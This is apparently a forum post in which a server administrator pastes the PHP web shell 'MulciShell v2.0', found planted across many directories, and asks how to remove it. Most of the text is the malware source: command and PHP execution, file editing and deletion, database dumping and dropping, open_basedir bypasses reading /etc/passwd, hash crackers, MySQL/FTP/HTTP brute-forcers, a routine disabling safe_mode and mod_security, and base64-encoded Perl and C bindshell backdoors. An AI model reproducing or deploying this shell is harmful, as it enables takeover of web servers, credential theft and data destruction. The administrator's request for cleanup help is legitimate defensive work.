krispykreme

part 2 of the same script (file was too large) function SQLLogin() { global $self; if(!isset($_SESSION['log'])&&!isset($_POST['mconnect'])) { echo "<center><form action='$self?act=sql' method='post'> Host: <input type='text' value='localhost' name='mhost'> Username: <input type='text' value='root' name='muser'> Password: <input type='password' value='' name='mpass'> Port: <input type='text' style='width: 40px' value='3306' name='mport'> <input type='submit' value='Connect' name='mconnect'> </form> </center>"; } elseif(!isset($_SESSION['log'])&&isset($_POST['mconnect'])) { extract($_POST); $conn=@mysql_connect($mhost.":".$mport,$muser,$mpass); if($conn) { $_SESSION['muser']=$muser; $_SESSION['mhost']=$mhost; $_SESSION['mpass']=$mpass; $_SESSION['mport']=$mport; $_SESSION['log']=true; header("Location: $self?act=sqledit"); } else echo "Failed to login with $muser@$mhost!<br>"; } else { header("Location: $self?act=sqledit"); } } function SQLEditor() { extract($_SESSION); $conn=@mysql_connect($mhost.":".$mport,$muser,$mpass); if($conn) { echo "Logged in as $muser@$mhost <a href='$self?act=logout'>[Logout]</a><center>"; echo "<form method='POST' action='$self?'> Quick SQL query: <input type='text' style='width: 300px' value='select * from users' name='sqlquery'> <input type='hidden' name='db' value='$_GET[db]'> <input type='submit' value='Go' name='sql'> </form>"; echo "<form action='$self?act=sqledit' method='post'> <input type='submit' style='border: none;' value='[ List Processes ]' name='sql_list_proc'> </form></center></br></br>"; if(isset($_POST['sql_list_proc'])) { $res=mysql_list_processes(); echo "<table style='margin: auto; text-align: center;'><tr> <td>Proc ID</td><td>Host</td><td>DB</td><td>Command</td><td>Time</td> </tr>"; while($r=mysql_fetch_assoc($res)) echo "<tr><td>$r[id]</td><td>$r[Host]</td><td>$r[db]</td><td>$r[Command]</td><td>$r[Time]</td></tr>"; mysql_free_result($res); echo "</table></br>"; } if(!isset($_GET['db'])) { if(isset($_POST['dbc'])) db_create(); if(isset($_GET['dropdb'])) SQLDrop(); echo "<table style='margin: auto; text-align: center;'> <tr><td>Database</td><td>Table count</td><td>Download</td><td>Drop</td></tr>"; $all_your_base=mysql_list_dbs($conn); while($your_base=mysql_fetch_assoc($all_your_base)) { $tbl=mysql_query("SHOW TABLES FROM $your_base[Database]"); $tbl_count=mysql_num_rows($tbl); echo "<tr><td><a href='$self?act=sqledit&db=$your_base[Database]'>$your_base[Database]</td><td>$tbl_count</td><td><a href='$self?act=download&db=$your_base[Database]'>Download</a></td><td><a href='$self?act=sqledit&dropdb=$your_base[Database]'>Drop</a></td></tr>"; } echo "</table></br><center><form action='$self?act=sqledit' method='post'>New database name: <input type='text' value='new_database' name='db_name'><input type='submit' style='border: none;' value='[ Create Database ]' name='dbc'></form></center></br>"; } elseif(isset($_GET['db'])&&!isset($_GET['tbl'])) { if(isset($_POST['tblc'])) table_create(); if(isset($_GET['droptbl'])) SQLDrop(); echo "<table style='margin: auto; text-align: center;'> <tr><td>Table</td><td>Column count</td><td>Dump</td><td>Drop</td></tr>"; $tables=mysql_query("SHOW TABLES FROM $_GET[db]"); while($tblc=mysql_fetch_array($tables)) { $fCount=mysql_query("SHOW COLUMNS FROM $_GET[db].$tblc[0]"); $fc=mysql_num_rows($fCount); echo "<tr><td><a href='$self?act=sqledit&db=$_GET[db]&tbl=$tblc[0]'>$tblc[0]</a></td><td>$fc</td><td><a href='$self?act=download&db=$_GET[db]&tbl=$tblc[0]'>Dump</td><td><a href='$self?act=sqledit&db=$_GET[db]&droptbl=$tblc[0]'>Drop</a></td></tr>"; } echo "</table></br><center><form action='$self?act=sqledit&db=$_GET[db]' method='post'>Create new table: <input type='text' value='new_table' name='table_name'><input type='hidden' value='$_GET[db]' name='db_current'> <input type='submit' style='border: none;' value='[ Create Table ]' name='tblc'></form></center>"; } elseif(isset($_GET['field'])&&isset($_POST['sqlsave'])) { $discard_values=mysql_query("SELECT * FROM $_GET[db].$_GET[tbl] WHERE $_GET[field]='$_GET[v]'"); $values=mysql_fetch_assoc($discard_values); $keys=array_keys($values); $values=array(); foreach($_POST as $k=>$v) if(in_array($k,$keys)) $values[]=$v; $query="UPDATE $_GET[db].$_GET[tbl] SET "; for($y=0;$y<count($values);$y++) { if($y==count($values)-1) $query.="$keys[$y]='$values[$y]' "; else $query.="$keys[$y]='$values[$y]', "; } $query.="WHERE $_GET[field] = '$_GET[v]'"; $try=mysql_query($query) or die(mysql_error()); echo "<center>Table updated!<br>"; echo "<a href='$self?act=sqledit&db=$_GET[db]&tbl=$_GET[tbl]'>Go back</a><br><br>"; } elseif(isset($_GET['field'])&&isset($_GET['v'])&&!isset($_GET['del'])) { echo "<center><form action='$self?act=sqledit&db=$_GET[db]&tbl=$_GET[tbl]&field=$_GET[field]&v=$_GET[v]' method='post'>"; $sql_fields=array(); $fields=mysql_query("SHOW COLUMNS FROM $_GET[db].$_GET[tbl]"); while($field=mysql_fetch_assoc($fields)) $sql_fields[]=$field['Field']; $data=mysql_query("SELECT * FROM $_GET[db].$_GET[tbl] WHERE $_GET[field]='$_GET[v]'"); $d_piece=mysql_fetch_assoc($data); for($m=0;$m<count($sql_fields);$m++) { $point=$sql_fields[$m]; echo "$point: <input type='text' value='$d_piece[$point]' name='$sql_fields[$m]'></br>"; } echo "<input type='submit' value='Save' name='sqlsave'></form></center>"; } elseif(isset($_GET['db'])&&isset($_GET['tbl'])) { if(isset($_GET['insert'])) SQLInsert(); if(isset($_GET['field'])&&isset($_GET['v'])&&isset($_GET['del'])) { echo "<center>"; if(@mysql_query("DELETE FROM $_GET[db].$_GET[tbl] WHERE $_GET[field]=$_GET[v]")) echo "Row deleted</br>"; else echo "Failed to delete row</br>"; echo "</center>"; } echo "<center><a href='$self?act=sqledit&db=$_GET[db]&tbl=$_GET[tbl]&insert=1'>[insert new row]</a></center>"; echo "<table style='margin: auto; text-align: center;'><tr>"; $cols=mysql_query("SHOW COLUMNS FROM $_GET[db].$_GET[tbl]"); $fields=array(); while($col=mysql_fetch_assoc($cols)) { array_push($fields,$col['Field']); echo "<td>$col[Field]</td>"; } echo "</tr>"; if(isset($_GET['s'])&&is_numeric($_GET['s'])) {$selector=mysql_query("SELECT * FROM $_GET[db].$_GET[tbl] LIMIT $_GET[s], 250");} else {$selector=mysql_query("SELECT * FROM $_GET[db].$_GET[tbl] LIMIT 0, 250");} while($select=mysql_fetch_row($selector)) { echo "<tr>"; for($i=0;$i<count($fields);$i++) { echo "<td>".htmlspecialchars($select[$i])."</td>"; } echo "<td><a href='$self?act=sqledit&db=$_GET[db]&tbl=$_GET[tbl]&field=$fields[0]&v=$select[0]'>Edit</a></td><td><a href='$self?act=sqledit&db=$_GET[db]&tbl=$_GET[tbl]&field=$fields[0]&v=$select[0]&del=true'>Delete</a></td>"; echo "</tr>"; } echo "</table>"; echo "<table style='margin: auto;'>"; if(isset($_GET['s'])) { $prev=intval($_GET['s'])-250; $next=intval($_GET['s'])+250; if($_GET['s']>0) echo "<tr><td><a href='$self?act=sqledit&db=$_GET[db]&tbl=$_GET[tbl]&s=$prev'>Previous</a></td>"; if(mysql_num_rows($selector)>249) echo "<td><a href='$self?act=sqledit&db=$_GET[db]&tbl=$_GET[tbl]&s=$next'>Next</a></td></tr>"; } else echo "<center><a href='$self?act=sqledit&db=$_GET[db]&tbl=$_GET[tbl]&s=250'>Next</a></center>"; echo "</table>"; } else { $_SESSION=array(); session_destroy(); header("Location: $self?act=sql"); } } } function SQLDownload() { extract($_SESSION); $conn=@mysql_connect($mhost.":".$mport,$muser,$mpass); if($conn) { if(isset($_GET['db'])&&!isset($_GET['tbl'])) { $tables=array(); $dump_file="##################SQL Database dump####################\n"; $dump_file.="######################Dumped by: MulciShell v0.2#####################\n\n"; $get_tables=mysql_query("SHOW TABLES FROM $_GET[db]"); while($current_table=mysql_fetch_array($get_tables)) $tables[]=$current_table[0]; foreach($tables as $table_dump) { $data_selection=mysql_query("SELECT * FROM $_GET[db].$table_dump"); while($current_data=mysql_fetch_assoc($data_selection)) { $fields=implode("`, `", array_keys($current_data)); $values=implode("`, `",array_values($current_data)); $dump_file.="INSERT INTO `$table_dump` ($fields) VALUES ($values); "; } } } elseif(isset($_GET['db'])&&isset($_GET['tbl'])) { $dump_file="##################SQL Database dump####################\n"; $dump_file.="######################Dumped by: MulciShell v0.2#####################\n"; $table_dump=mysql_query("SELECT * FROM $_GET[db].$_GET[tbl]"); while($table_data=mysql_fetch_assoc($table_dump)) { $fields=implode("`, `",array_keys($table_data)); $values=implode("`, `",array_values($table_data)); $dump_file.="INSERT INTO `$_GET[db].$_GET[tbl]` ($fields) VALUES ($values`)\n"; } } else { echo "Invalid!"; } } $dump_file.="########################################################################################"; if(!isset($_GET['tbl'])) $file_name="$_GET[db]"."_DUMP.sql"; else $file_name="$_GET[db]"."_$_GET[tbl]"."_DUMP.sql"; ob_get_clean(); header("Content-type: application/octet-stream"); header("Content-length: ".strlen($dump_file)); header("Content-disposition: attachment; filename=$file_name;"); echo $dump_file; exit; } function SqlInsert() { extract($_SESSION); $conn=@mysql_connect($mhost.":".$mport,$muser,$mpass); if($conn) { if(!isset($_POST['sql_insert'])) { echo "<form action='$self?act=sqledit&db=$_GET[db]&tbl=$_GET[tbl]&insert=1' method='post'><center>"; $sql_fields=array(); $fields=mysql_query("SHOW COLUMNS FROM $_GET[db].$_GET[tbl]"); while($f=mysql_fetch_assoc($fields)) $sql_fields[]=$f['Field']; for($s=0;$s<count($sql_fields);$s++) echo "$sql_fields[$s]: <input type='text' name='$sql_fields[$s]'></br>"; echo "<input type='submit' value='Insert' name='sql_insert'></center></form>"; } else { $fields=mysql_query("SHOW COLUMNS FROM $_GET[db].$_GET[tbl]"); while($f=mysql_fetch_assoc($fields)) $sql_fields[]=$f['Field']; $values=array(); $keys=array(); $query="INSERT INTO $_GET[db].$_GET[tbl] ("; foreach($_POST as $k=>$v) { if(in_array($k,$sql_fields)&&!empty($v)) { $values[]=$v; $keys[]=$k; } } for($k=0;$k<count($keys);$k++) { if($k==count($keys)-1) $query.="`$keys[$k]`"; else $query.="`$keys[$k]`,"; } $query.=") VALUES ("; for($v=0;$v<count($values);$v++) { if($v==count($values)-1) $query.="'$values[$v]'"; else $query.="'$values[$v]',"; } $query.=")"; echo "<center>"; if(@mysql_query($query)) echo "Row inserted</br>"; else echo "Failed to insert row</br>"; echo "</center>"; } } } function SQLDrop() { echo "<center>"; extract($_SESSION); $conn=@mysql_connect($mhost.":".$mport,$muser,$mpass); if($conn) { if(!isset($_GET['droptbl'])) { $query="DROP DATABASE $_GET[dropdb]"; if(@mysql_query($query)) echo "Database $_GET[dropdb] has been dropped<br>"; else echo "Failed to drop database $_GET[dropdb]<br>"; } elseif(isset($_GET['db'])&&isset($_GET['droptbl'])) { $query="DELETE FROM $_GET[db].$_GET[droptbl]"; if(@mysql_query($query)) echo "Table $_GET[droptbl] has been dropped<br>"; else echo "Failed to drop table $_GET[droptbl]<br>"; } else { echo "Invalid request<br>"; } } else echo "Failed to connect<br>"; echo "</center>"; } function db_create() { echo "<center>"; if(isset($_POST['db_name']) && !empty($_POST['db_name'])) { extract($_SESSION); @$conn=mysql_connect($mhost.":".$mport,$muser,$mpass); if($conn) { if(@mysql_query("CREATE DATABASE $_POST[db_name]")) echo "Status: Database $_POST[db_name] created!"; else echo "Failed to create database $_POST[db_name]</br>"; } else echo "Failed to connect</br>"; } else echo "Enter a DB name</br>"; echo "</cenetr>"; } function table_create() { echo "<center>"; if(isset($_POST['table_name'])&&!empty($_POST['table_name'])) { extract($_SESSION); @$conn=mysql_connect($mhost.":".$mport,$muser,$mpass); if($conn) { @mysql_select_db($_POST['db_current']); if(@mysql_query("CREATE TABLE `$_POST[table_name]` (`TEMPORARY` TEXT NOT NULL)")) echo "Status: Table $_POST[table_name] created!"; else echo "Failed to create table $_POST[table_name]"; } else echo "Failed to connect!</br>"; } else echo "Enter a table name</br>"; echo "</center>"; } function FileEditor() { if(isset($_GET['file'])) $file=$_GET['file']; elseif(isset($_POST['nfile'])) $file=$_POST['nfile']; elseif(isset($_POST['editfile'])) $file=$_POST['editfile']; if(@!file_exists($file)) die("Permission denied!"); if(isset($_POST['dfile'])) { @$fh=fopen($file,'r'); @$buffer=fread($fh,filesize($file)); header("Content-type: application/octet-stream"); header("Content-length: ".strlen($buffer)); header("Content-disposition: attachment; filename=".basename($file).';'); @ob_get_clean(); echo $buffer; @fclose($fh); } elseif(isset($_POST['delfile'])) { if(!unlink(str_replace("//","/",$file))) echo "Failed to delete file!<br>"; else echo "File deleted<br>"; } elseif(isset($_POST['sfile'])) { $fh=@fopen($file,'w') or die("Failed to open file for editing!"); @fwrite($fh,stripslashes($_POST['file_contents']),strlen($_POST['file_contents'])); echo "File saved!"; @fclose($fh); } else { $fh=@fopen($file,'r'); echo "<center> <form action='$self?act=f' method='post'> File to edit: <input type='text' style='width: 300px' value='$file' name='nfile'> <input type='submit' value='Go' name='gfile'></br></br>"; echo "<textarea rows='20' cols='150' name='file_contents'>".htmlspecialchars(@fread($fh,filesize($file)))."</textarea></br></br>"; echo "<input type='submit' value='Save file' name='sfile'> <input type='submit' value='Download file' name='dfile'> <input type='submit' value='Delete file' name='delfile'> </center></form>"; @fclose($fh); } } function security_bypass() { if(isset($_POST['curl_bypass'])) { $ch=curl_init("file://$_POST[file_bypass]"); curl_setopt($ch,CURLOPT_HEADERS,0); curl_setopt($ch,CURLOPT_RETURNTRANSFER,1); $file_out=curl_exec($ch); curl_close($ch); echo "<textarea rows='20' cols='150' readonly>".htmlspecialchars($file_out)."</textarea></br></br>"; } elseif(isset($_POST['tmp_bypass'])) { tempnam("/home/",$_POST['file_passwd']); } elseif(isset($_POST['copy_bypass'])) { if(@copy($_POST['file_bypass'],$_POST['dest'])) { echo "File successfully copied!</br>"; @$fh=fopen($_POST['dest'],'r'); echo "<textarea rows='20' cols='150' readonly>".htmlspecialchars(@fread($fh,filesize($_POST['dest'])))."</textarea></br></br>"; @fclose($fh); } else echo "Failed to copy file</br>"; } elseif(isset($_POST['include_bypass'])) { if(file_exists($_POST['file_bypass'])) { echo "<textarea rows='20' cols='150' readonly>"; @include($_POST['file_bypass']); echo "</textarea>"; } } elseif(isset($_POST['sql_bypass'])) { extract($_SESSION); $conn=mysql_connect($mhost.":".$mport,$muser,$mpass); if($conn) { mysql_select_db($_POST['sql_db']); mysql_query("CREATE TABLE `$_POST[tmp_table]` (`File` TEXT NOT NULL);"); mysql_query("LOAD DATA INFILE \"$_POST[sql_file]\" INTO TABLE $_POST[tmp_table]") or die(mysql_error()); $res=mysql_query("SELECT * FROM $_POST[tmp_table]"); if(mysql_num_rows($res)<1) die("Failed to retrieve file contents!"); if($res) { while($row=mysql_fetch_array($res)) $f.="$row[0]</br>"; echo $f; } mysql_query("DROP TABLE $_POST[tmp_table]"); } } echo "<table style='margin: auto; width: 100%; text-align: center;'><tr><td colspan='2'>Security (open_basedir) bypassers</td></tr> <tr><td>Bypass using cURL</td><td>Bypass using tempnam()</td></tr> <tr><td><form action='$self?act=bypass' method='post' name='bypasser'>Read file: <input type='text' value='/etc/passwd' name='file_bypass'><input type='submit' name='curl_bypass' value='Bypass'></form></td><td><form action='$self?act=bypass' method='post' name='bypasser'>Write file: <input type='text' value='../../../etc/passwd' name='file_bypass'><input type='submit' name='tmp_bypass' value='Bypass'></form></td></tr> <tr><td>Bypass using copy()</td><td>Bypass using include()</td></tr> <tr><td><form action='$self?act=bypass' method='post' name='bypasser'>Copy to: <input type='text' style='width: 250px;' name='dest' value='".CleanDir(getcwd())."/copy.php'></br> File to copy: <input type='text' value='/etc/passwd' name='file_bypass'><input type='submit' name='copy_bypass' value='Bypass'></form></td><td><form action='$self?act=bypass' method='post' name='bypasser'>Path to file: <input type='text' value='/etc/passwd' name='file_bypass'><input type='submit' name='include_bypass' value='Bypass'></form></td></tr> <tr><td colspan='2'>Bypass using SQL LOAD INFILE [Login to SQL server first]</td></tr> <tr><td colspan='2'><form action='$self?act=bypass' method='post' name='bypasser'>[Existing] Database to store temporary table: <input type='text' value='tmp_database' name='sql_db'></br>Temporary table: <input type='text' value='tmp_file' name='tmp_table'></br><input type='text' value='/etc/passwd' name='sql_file'><input type='submit' name='sql_bypass' value='Bypass'></form></td></tr> </table>"; } function brute_force() { echo "<form action='$self' method='post' enctype='multipart/form-data'><input type='hidden' name='docrack'><table style='margin: auto; width: 100%; text-align: center;'><tr><td colspan='2'>Password crackers</td></tr> <tr><td>MD5 Cracker</td><td>SHA1 Cracker</td></tr> <tr><td>Hash: <input type='text' name='md5hash'><input type='submit' value='Crack' name='md5crack'></td><td>Hash: <input type='text' name='sha1hash'><input type='submit' value='Crack' name='sha1crack'></td></tr> <tr><td>VBulletin Salt Cracker</td><td>SMF Salt cracker</td></tr> <tr><td>Hash: <input type='text' name='vbhash'></br>Salt: <input type='text' name='vbsalt' salt='#7A'></br><input type='submit' value='Crack' name='vbcrack'></td><td>Hash: <input type='text' name='smfhash'></br>Salt: <input type='text' name='smfsalt'></br><input type='submit' value='Crack' name='smfcrack'></td></tr> <tr><td>MySQL Brute Force</td><td>FTP Brute Force</td></tr> <tr><td>User: <input type='text' value='root' name='mysql_user'></br>Host: <input type='text' value='localhost' name='mysql_host'></br>Port: <input type='text' value='3306' name='mysql_port'></br><input type='submit' value='Brute' name='mysqlcrack'></td><td>User: <input type='text' value='root' name='ftp_user'></br>Host: <input type='text' value='localhost' name='ftp_host'></br>Port: <input type='text' value='21' name='ftp_port'></br>Timeout: <input type='text' value='5' name='ftp_timeout'></br><input type='submit' value='Brute' name='ftpcrack'></td></tr> <tr><td>Remote login Brute Force</td><td>HTTP-Auth Brute Force</td></tr> <tr><td>Login form: <input type='text' value='' name='remote_login_target'></br>Username: <input type='text' value='admin' name='remote_login_user'><input type='submit' value='Brute' name='remote_login'></td><td>Username: <input type='text' name='auth_user' value='porn_user101'></br>Auth URL: <input type='text' name='auth_url'><input type='submit' value='Brute' name='authcrack'></td></tr> <tr><td colspan='2'>Wordlist</td></tr> <tr><td colspan='2'><input type='file' name='wordlist'></br></br><b>Notice: Be sure to check the max POST length allowed</b></td></tr> </br></table></form>"; } function BackDoor() { global $backdoor_perl; global $disable; if(!isset($_POST['backdoor_host'])) { echo "<center><form action='$self?act=bh' method='post'> Port: <input type='text' name='port'> <input type='submit' name='backdoor_host' value='Backdoor'></center>"; } else { @$fh=fopen("shbd.pl","w"); @fwrite($fh,base64_decode($backdoor_perl)); @fclose($fh); execmd("perl shbd.pl $_POST[port]",$disable); echo "Server backdoor'd</br>"; } } function disable_sec() { @$ini=fopen("php.ini","w "); @fwrite($ini,"disable_functions= open_basedir=Off safe_mode=Off safe_mode_gid=Off remote_includes=On "); @$hta = fopen(".htaccess","w "); @fwrite($hta,"<IfModule mod_security.c> SecFilterEngine Off SecFilterScanPOST Off SecFilterCheckURLEncoding Off SecFilterCheckUnicodeEncoding Off </IfModule>"); @fclose($ini); @fclose($hta); } function sql_rep_search($dir) { global $self; $ext=array(".db",".sql"); @$dh=opendir($dir); while((@$file=readdir($dh))) { $ex=strrchr($file,'.'); if(in_array($ex,$ext)&&$file!="Thumbs.db"&&$file!="thumbs.db") echo "<tr><td><center><a href='$self?act=f&file=$dir"."$file'>$dir"."$file</center></td></tr>"; if(is_dir($dir.$file)&&$file!='..'&&$file!='.') { if(!preg_match("/\/public_html\//",$dir)) sql_rep_search($dir.$file.'/public_html/'); else sql_rep_search($dir.$file); } } @closedir($dh); } function database_tools() { if(isset($_POST['sql_start_search'])) { echo "<center><table style='width: auto;'><tr><td><center><font color='#FF0000'>Databases</font></center></td></tr>"; sql_rep_search("/home/"); echo "</table></center>"; } $colarr=array(); if(isset($_POST['db_parse'])) { if(!is_file($_FILES['db_upath']['tmp_name'])&&empty($_POST['db_dpath'])) die("Please specify a DB to parse..."); $db_meth=empty($_POST['db_dpath'])?'uploaded':'path'; $q_delimit=$_POST['q_delimit']; if(isset($_POST['column_defined'])) { switch($_POST['column_type']) { case 'SMF': break; case 'phpbb': break; case 'vbulletin': $colarr=array(4,5,7,48); break; } } else { $strr=str_replace(", ",",",trim($_POST['db_columns'])); $colarr=explode(",",$strr); } switch($db_meth) { case 'uploaded': @$fh=fopen($_FILES['db_upath']['tmp_name'],'r') or die("Failed to open file for reading"); break; case 'path': @$fh=fopen($_POST['db_dpath'],'r') or die("Failed to open file for reading"); break; } echo "Parsing database contents...</br>"; while(!feof($fh)) { $c_line=fgets($fh); $strr=str_replace(", ",",",$c_line); $arr=explode(',',$strr); for($i=0;$i<count($colarr);$i++) { $index=$colarr[$i]; if(empty($arr[$index])) continue; $spos=strpos("$_POST[q_delimit]",$arr[$index]); $spos=strpos("$_POST[q_delimit]",$arr[$index],$spos); if($i!==count($colarr)-1) echo "$arr[$index] : "; else echo "$arr[$index]</br>"; } continue; } @fclose($fh); } echo "<table style='width: 100%; margin: auto; text-align: center'> <tr><td colspan='2'>Database parser</td></tr> <tr><td> <form action='$self?act=dbs' method='post' enctype='multipart/form-data'> Quote delimiter (usually ` or '): <input type='text' style='width: 20px' name='q_delimit' value='`'> Columns to retrieve (separate by commas): <input type='text' style='width: 200px' name='db_columns' value='3,5,10'></br> Use predefined column match (user+pass+salt): <input type='checkbox' name='column_defined'> <select name='column_type'> <option value='vbulletin'>VBulletin</option><option value='SMF'>SMF</option><option value='phpbb'>PHPBB</option> </select></br> Path to DB dump: <input type='text' style='width: 300px' value='/home/someuser/public_html/backup.db' name='db_dpath'> </br>Upload DB dump: <input type='file' style='width: 300px' value='' name='db_upath'> </br></br><input type='submit' style='width: 300px' value='Parse Database' name='db_parse'></td></tr> <tr><td colspan='2'>Find database Backups</td></tr> <tr><td>Only search within local path: <input type='checkbox' name='sql_search_local'> <input type='submit' value='Go' name='sql_start_search'></br></td></tr> </table>"; } function show_tools() { echo "<form action='$self' method='post'> <table style='width: 100%; margin: auto; text-align: center'> <tr><td colspan='2'>Tools</td></tr> <tr><td>Forum locator</td><td>Config locator</td></tr> <tr><td><form action='$self' method='post'>Passwd file: <input type='text' value='/etc/passwd' name='passwd'><input type='submit' value='Find forums' name='find_forums'></form></td><td><form action='$self' method='post'>Passwd file: <input type='text' value='/etc/passwd' name='passwd'><input type='submit' value='Find forums' name='find_configs'></form></td></tr> <tr><td>Port scanner</td><td>Search</td></tr> <tr><td><form action='$self' method='post'>Host: Start port: <input type='text' value='localhost' name='host'></br>Start port: <input type='text' value='80' style='width: 50px' name='sport'> End Port: <input type'text' style='width: 50px' value='1000' name='eport'></br><input type='submit' value='Scan' name='port_scan'>Using: <select name='type'><option value='php'>PHP</option><option value='perl'>Perl</option></select></form></td><td>Finish this next</td></tr> </table>"; } function TrueSize($s) { if(!$s) return 0; if($s>=1073741824) return(round($s/1073741824)." GB"); elseif($s>=1048576) return(round($s/1048576)." MB"); elseif($s>=1024) return(round($s/1024)." KB"); else return($s." B"); } function CleanDir($d) { $d=str_replace("\\","/",$d); $d=str_replace("//","/",$d); return $d; } function Trail($d) { $d=explode('/',$d); array_pop($d); array_pop($d); $str=implode($d,'/'); return $str; } function Encoder() { echo "<form action='$self?' method='post'> <center> Input: <input type='text' style='width: 300px' name='encrypt'> <br><input type='submit' value='Encrypt' name='encryption'> </center> </form>"; } $relpath=(isset($_GET['d']))?CleanDir($_GET['d']):CleanDir(realpath(getcwd())); if(isset($_GET['d'])) $self.="?d=$_GET[d]"; echo "<table style='text-align: center; width: 100%'> <tr><td colspan='2'>Execute command</td></tr> <tr><td colspan='2'><form action='$self?' method='post'><input type='text' style='width: 600px' value='whoami' name='cmd'><input type='submit' name='execmd' value='Execute'></form></td></tr> <tr><td colspan='2'>Execute PHP</td></tr> <tr><td colspan='2'><form action='$self' method='post'><textarea rows='2' cols='80' name='phpcode' style='background-color: black;'>//Don't include PHP tags</textarea><input type='submit' name='execphp' value='Execute'></form></td></tr> <tr><td>Create directory</td><td>Create file</td></tr> <tr><td><form action='$self' method='post'><input type='text' style='width: 250px' value='$relpath/sikreet/' name='newdir'><input type='submit' value='Create' name='cnewdir'></form></td><td><form action='$self' method='post'><input type='text' style='width: 250px' value='$relpath/index2.php' name='newfile'><input type='submit' value='Create' name='cnewfile'></form></td></tr> <tr><td>Enter directory</td><td>Edit file</td></tr> <tr><td><form action='$self' method='post'><input type='text' style='width: 225px' name='godir'><input type='submit' value='Go' name='enterdir'></form></td><td><form action='$self' method='post'><input type='text' style='width: 255px' value='/etc/passwd' name='editfile'><input type='submit' name='doeditfile' value='Go'></form></td></tr> <tr><td>Upload file</td><td>Wget file</td></tr> <tr><td><form action='$self' method='post' enctype='multipart/form-data'>Save location: <input type='text' style='width: 300px' value='$relpath' name='u_location'></br><input type='file' name='u_file'><input type='submit' value='Upload' name='doUpload'></form></td><td><form action='$self' method='post'><input type='text' style='width: 255px' value='http://www.site.com/image1.jpg' name='wgetfile'><input type='submit' name='dogetfile' value='Go'></form</td></tr> <tr><td colspan='2'>Switch theme: <a href='$self?theme=green'>Matrix Green</a>, <a href='$self?theme=uplink'>Uplink Blue</a>, <a href='$self?theme=dark'>Dark</a></td></tr> </table> </br></br><div id='bar'><center>Shell [version 2.0] created by <font color='red'><b>[MulCiber]</font> | Page generated in : <font color='red'>".round(microtime()-$start,2)." seconds</font><br><font color=red><b>Uploaded By VLinhT </b></font></center></div></body></html>"; ob_end_flush(); ?>

Hello, I found this rogue script on my server. I tried to run it myself, but nothing really happend that I could tell. On one of the domains it was in EVERY directory, I see in the script where it spreads, but I was wondering if there would be an easier way to delete it since it is probably on my server in 500 different areas in the same name "sss.php" I'm thinking it got on my server sicne there is a directory that allows users to upload files with permissions to the folder "777" which i think is full, but I figured I'll fix that and make it so they can't execute in that folder? Either way let me know your thoughts. here is the code: <?php #/\/\/\/\/\ MulCiShell v2.0 /\/\/\/\/\/\/\# # Updates from version 1.0# # 1) Fixed MySQL insert function # 2) Fixed trailing dirs # 3) Fixed file-editing when set to 777 # 4) Removed mail function (who needs it?) # 5) Re-wrote & improved interface # 6) Added actions to entire directories # 7) Added config+forum finder # Added MySQL dump function # 9) Added DB+table creation, DB drop, table delete, and column+table count # 10) Updated security-info feature to include more useful details # 11) _Greatly_ Improved file browsing and handling # 12) Added banner # 13) Added DB-Parser and locator # 14) Added enumeration function # 15) Added common functions for bypassing security restrictions # 16) Added bindshell & backconnect (needs testing) # 17) Improved command execution (alts) #/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/# @ini_set("memory_limit","256M"); @set_magic_quotes_runtime(0); session_start(); ob_start(); $start=microtime(); if(isset($_GET['theme'])) $_SESSION['theme']=$_GET['theme']; //Thanks korupt $backdoor_c="DQojaW5jbHVkZSA8YXNtL2lvY3Rscy5oPg0KI2luY2x1ZGUgPHN5cy90aW1lLmg+DQojaW5jbHVkZSA8c3lzL3NlbGVjdC5oPg0KI2luY2x1ZGUgPHN0ZGxpYi5oPg0KI2luY2x1ZGUgPHVuaXN0ZC5oPg0KI2luY2x1ZGUgPGVycm5vLmg+DQojaW5jbHVkZSA8c3RyaW5nLmg+DQojaW5jbHVkZSA8bmV0ZGIuaD4NCiNpbmNsdWRlIDxzeXMvdHlwZXMuaD4NCiNpbmNsdWRlIDxuZXRpbmV0L2luLmg+DQojaW5jbHVkZSA8c3lzL3NvY2tldC5oPg0KI2luY2x1ZGUgPHN0ZGludC5oPg0KI2luY2x1ZGUgPHB0aHJlYWQuaD4NCg0Kdm9pZCAqQ2xpZW50SGFuZGxlcih2b2lkICpjbGllbnQpDQp7DQoJaW50IGZkID0gKGludCljbGllbnQ7DQoJZHVwMihmZCwgMCk7DQoJZHVwMihmZCwgMSk7DQoJZHVwMihmZCwgMik7DQoJaWYoZm9yaygpID09IDApDQoJCWV4ZWNsKCIvYmluL2Jhc2giLCAicmVzbW9uIiwgMCk7DQoJY2xvc2UoZmQpOw0KCXJldHVybiAwOw0KfQ0KDQppbnQgbWFpbihpbnQgYXJnYywgY2hhciAqYXJndltdKQ0Kew0KCWludCBtc29jaywgY3NvY2ssIGkgPSAxOw0KCXB0aHJlYWRfdCB0aHJlYWQ7DQoJc3RydWN0IHNvY2thZGRyIHNhZGRyOw0KCXN0cnVjdCBzb2NrYWRkcl9pbiBzYWRkckluOw0KICAgIGludCBwb3J0PWF0b2koYXJndlsxXSk7DQoJaWYoKG1zb2NrID0gc29ja2V0KEFGX0lORVQsIFNPQ0tfU1RSRUFNLCBJUFBST1RPX1RDUCkpID09IC0xKQ0KCQlyZXR1cm4gLTE7DQoNCglzYWRkckluLnNpbl9mYW1pbHkJCT0gQUZfSU5FVDsNCglzYWRkckluLnNpbl9hZGRyLnNfYWRkcgk9IElOQUREUl9BTlk7DQoJc2FkZHJJbi5zaW5fcG9ydAkJPSBodG9ucyhwb3J0KTsNCiAgIA0KCW1lbWNweSgmc2FkZHIsICZzYWRkckluLCBzaXplb2Yoc3RydWN0IHNvY2thZGRyX2luKSk7DQoJc2V0c29ja29wdChtc29jaywgU09MX1NPQ0tFVCwgU09fUkVVU0VBRERSLCAoY2hhciAqKSZpLCBzaXplb2YoaSkpOw0KIA0KCWlmKGJpbmQobXNvY2ssICZzYWRkciwgc2l6ZW9mKHNhZGRyKSkgIT0gMCl7DQoJCWNsb3NlKG1zb2NrKTsNCgkJcmV0dXJuIC0xOw0KCX0NCiANCglpZihsaXN0ZW4obXNvY2ssIDEwKSA9PSAtMSl7DQoJCWNsb3NlKG1zb2NrKTsNCgkJcmV0dXJuIC0xOw0KCX0NCiANCgl3aGlsZSgxKXsNCgkJaWYoKGNzb2NrID0gYWNjZXB0KG1zb2NrLCBOVUxMLCBOVUxMKSkgIT0gLTEpew0KCQkJcHRocmVhZF9jcmVhdGUoJnRocmVhZCwgMCwgaGFuZGxlciwgKHZvaWQgKiljc29jayk7DQoJCX0NCgl9DQoJDQoJcmV0dXJuIDE7D